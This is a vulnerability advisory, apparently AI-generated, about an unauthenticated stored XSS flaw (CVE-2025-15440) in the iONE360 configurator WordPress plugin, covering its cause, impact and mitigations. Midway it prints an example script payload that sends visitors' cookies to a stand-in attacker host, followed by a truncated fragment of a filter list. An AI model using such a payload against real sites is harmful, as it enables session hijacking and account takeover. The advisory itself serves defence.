
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-15440 is a Stored Cross-Site Scripting (XSS) vulnerability in the iONE360 configurator plugin for WordPress, affecting all versions up to and including 2.0.57. The flaw exists due to insufficient input sanitization and output escaping in the Contact Form Parameters, allowing unauthenticated attackers to inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on February 11, 2026, and carries a CVSS v3.1 base score of 7.2 (High) (Red Hat CVE, Wordfence).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), stemming from the plugin's failure to properly sanitize user-supplied input in Contact Form Parameters before storing and rendering it in web pages. Because no authentication is required and the scope is changed (affecting users beyond the attacker's session), an attacker can submit a crafted payload through the contact form that is persistently stored and later executed in victims' browsers. No specific PoC code has been publicly referenced, but the attack vector is network-accessible with low complexity and no privileges required (Red Hat CVE, Infinit Security).
Successful exploitation allows attackers to execute malicious JavaScript in the browsers of any user who visits an injected page, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, phishing redirects). Because the vulnerability is unauthenticated and stored, a single exploit submission can affect all subsequent visitors to the compromised page, including administrators, potentially enabling privilege escalation or site takeover. Availability is not directly impacted (Red Hat CVE, Wordfence).
As of the time of disclosure, no patch was available for this vulnerability, leaving all installations of iONE360 configurator at version 2.0.57 and below exposed. The EPSS score is approximately 0.215%, indicating a relatively low but non-negligible probability of exploitation in the near term. No in-the-wild exploitation, threat actor attribution, or CISA KEV catalog listing has been reported (Red Hat CVE, Wordfence).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, to be injected into a vulnerable Contact Form Parameter field.<script>, javascript:, onerror=, etc.) in parameter fields.At the time of disclosure, no patched version of the iONE360 configurator plugin was available, and all versions up to and including 2.0.57 are affected. Site administrators should consider disabling or removing the plugin until a fix is released by the vendor. As a compensating control, deploying a Web Application Firewall (WAF) with XSS filtering rules (e.g., Wordfence, Cloudflare WAF) can help block malicious payloads from being submitted. Monitor the plugin's WordPress repository page for an updated release and apply it immediately upon availability (Wordfence, Red Hat CVE).
Wordfence included CVE-2025-15440 in its weekly WordPress vulnerability report for February 9–15, 2026, highlighting it as an unauthenticated stored XSS issue with no available patch at the time of reporting (Wordfence). Security aggregators such as VulDB, Vulners, and Red Packet Security also picked up the disclosure, indicating standard community awareness without notable controversy or significant social media discussion (Red Packet Security).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."